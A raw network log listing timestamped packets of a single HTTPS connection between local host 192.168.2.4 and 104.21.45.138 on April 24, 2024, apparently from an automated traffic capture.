Apr 24, 2024 06:54:14.221050024 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.221570969 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.221626997 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.223261118 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.223320961 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.224030018 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.224086046 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.224199057 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.224242926 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.224670887 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.224723101 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.224865913 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.224926949 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.225085020 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.225142002 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.225298882 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.225362062 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.225493908 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.225541115 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.225647926 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.225692987 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.225898027 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.225944996 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.226594925 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.226645947 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.227039099 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.227085114 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.227953911 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.228009939 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.228609085 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.228663921 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.231311083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.231318951 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.231363058 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.231386900 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.231399059 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.231412888 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.233288050 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.233302116 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.233366966 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.233372927 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.236735106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.236749887 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.236809969 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.236818075 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.236829042 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.239353895 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.239367962 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.239424944 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.239429951 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.239447117 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.242039919 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.242053032 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.242121935 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.242136002 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.244999886 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.245013952 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.245070934 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.245088100 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.245099068 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.248063087 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.248080015 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.248166084 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.248179913 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.250857115 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.250869989 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.250931978 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.250937939 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.292768955 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.377156019 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.377173901 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.377317905 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.377341032 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.377382994 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.380568981 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.380584002 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.380683899 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.380697966 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.380748987 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.383198023 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.383213997 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.383311033 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.383322001 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.383361101 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.386056900 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.386071920 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.386132002 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.386142969 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.386185884 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.388955116 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.388971090 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.389039993 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.389053106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.389097929 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.391863108 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.391879082 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.391952038 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.391963005 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.392010927 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.394823074 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.394838095 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.394903898 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.394913912 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.394927979 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.394958973 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.397449970 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.397465944 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.397528887 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.397543907 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.397555113 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.397576094 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.400563002 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.400578022 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.400645018 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.400655985 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.400671005 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.400691986 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.403584957 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.403601885 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.403654099 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.403665066 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.403675079 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.403702021 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.406332016 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.406347990 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.406421900 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.406438112 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.406476974 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.409054041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.409069061 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.409127951 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.409141064 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.409156084 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.409179926 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.412059069 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.412075043 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.412131071 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.412146091 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.412158966 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.412182093 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.414813042 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.414829969 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.414882898 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.414897919 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.414907932 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.414932966 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.417663097 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.417678118 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.417769909 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.417782068 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.417820930 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.420420885 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.420438051 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.420510054 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.420532942 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.420574903 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.422981977 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.422996044 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.423086882 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.423099995 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.423141956 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.426285028 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.426300049 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.426378965 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.426390886 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.426436901 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.429028034 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.429043055 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.429121971 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.429133892 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.429169893 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.431843042 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.431858063 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.431919098 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.431930065 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.431967020 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.435302019 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.435318947 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.435394049 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.435405970 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.435441971 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.438025951 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.438041925 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.438098907 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.438112974 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.438123941 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.438144922 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.440599918 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.440614939 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.440682888 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.440692902 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.440732956 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.443203926 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.443219900 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.443269968 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.443281889 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.443295956 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.443314075 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.446599960 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.446614981 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.446676016 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.446686029 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.446723938 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.449439049 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.449454069 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.449512005 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.449523926 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.449561119 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.455980062 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.455996037 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.456064939 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.456077099 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.456116915 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.538005114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.538039923 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.538146973 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.538175106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.538191080 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.538228989 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.540651083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.540669918 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.540720940 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.540735006 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.540759087 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.540781975 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.543171883 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.543188095 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.543263912 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.543275118 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.543313980 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.546230078 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.546276093 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.546307087 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.546314955 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.546341896 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.546358109 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.549532890 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.549581051 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.549735069 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.549746990 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.549787998 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.552159071 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.552206993 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.552236080 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.552248001 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.552267075 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.552294970 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.554944992 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.554996014 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.555022001 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.555031061 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.555056095 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.555073977 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.558326006 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.558370113 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.558505058 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.558515072 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.558598995 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.561007023 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.561053991 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.561088085 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.561095953 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.561115980 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.561131001 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.563889980 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.563935041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.563972950 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.563980103 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.563992023 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.564018011 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.566344976 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.566397905 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.566425085 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.566431046 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.566454887 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.566472054 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.569538116 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.569591045 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.569617033 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.569626093 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.569648981 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.569665909 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.572540045 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.572583914 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.572616100 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.572626114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.572650909 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.572665930 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.575078011 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.575153112 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.575160980 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.575216055 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.577815056 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.577835083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.577887058 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.577893019 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.577929974 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.580579996 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.580605030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.580643892 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.580651999 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.580667019 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.580683947 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.584072113 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.584130049 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.584141970 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.584151030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.584178925 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.584196091 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.586493015 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.586510897 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.586565018 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.586570024 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.586606026 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.589232922 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.589251041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.589303970 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.589309931 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.589344978 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.592614889 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.592633963 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.592689037 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.592695951 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.592734098 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.595426083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.595443964 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.595495939 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.595501900 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.595537901 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.597963095 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.597980022 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.598036051 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.598042965 CEST	443	49732	104.21.45.138	192.168.2.4
